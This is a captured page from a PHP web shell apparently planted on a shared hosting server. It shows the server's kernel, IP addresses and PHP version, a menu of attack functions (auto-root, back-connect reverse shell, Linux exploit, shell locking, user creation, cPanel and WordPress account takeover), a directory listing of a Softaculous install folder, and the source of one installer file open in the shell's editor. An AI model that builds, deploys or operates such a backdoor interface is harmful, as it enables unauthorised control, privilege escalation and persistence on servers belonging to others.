Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.221.192.248
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
thbees /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
1.31
KB
-rw-r--r--
clone.php
13.84
KB
-rw-r--r--
edit.php
6.49
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
extend.php
1.99
KB
-rw-r--r--
fileindex.php
386
B
-rw-r--r--
import.php
3.94
KB
-rw-r--r--
info.xml
3.24
KB
-rw-r--r--
install.js
1.12
KB
-rw-r--r--
install.php
10.66
KB
-rw-r--r--
install.xml
1.39
KB
-rw-r--r--
md5
1.1
KB
-rw-r--r--
notes.txt
1.47
KB
-rw-r--r--
settings.inc.php
610
B
-rw-r--r--
thbees.sql
445.35
KB
-rw-r--r--
thbees.zip
40.97
MB
-rw-r--r--
update_pass.php
1.18
KB
-rw-r--r--
update_rijndael.php
1.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update_rijndael.php
<?php @unlink('update_rijndael.php'); //Required to autoload the namespaces require_once 'vendor/autoload.php'; //Generate PHP_ENCRYPTION_KEY and store it in settings.inc.php $secureKey = \Defuse\Crypto\Key::createNewRandomKey(); $phpenckey = $secureKey->saveToAsciiSafeString(); echo '<phpenckey>'.$phpenckey.'</phpenckey>'; if (function_exists('mcrypt_encrypt') && version_compare(phpversion(), '7.1.0', '<')){ echo '</br>'.'RIJNDAEL_KEYS'.'</br>'; $rijndael_iv = __getiv(); $rijndael_key = __getkey(); echo '<rijndael_iv>'.$rijndael_iv.'</rijndael_iv>'; echo '<rijndael_key>'.$rijndael_key.'</rijndael_key>'; } function __getkey(){ $key_size = mcrypt_get_key_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_ECB); $key = __passwdGen($key_size); return $key; } function __passwdGen($length = 8){ $str = 'abcdefghijkmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'; for ($i = 0, $passwd = ''; $i < $length; $i++) $passwd .= substr($str, mt_rand(0, strlen($str) - 1), 1); return $passwd; } function __getiv(){ $iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_ECB); $iv = base64_encode(mcrypt_create_iv($iv_size, MCRYPT_RAND)); return $iv; } ?>
Close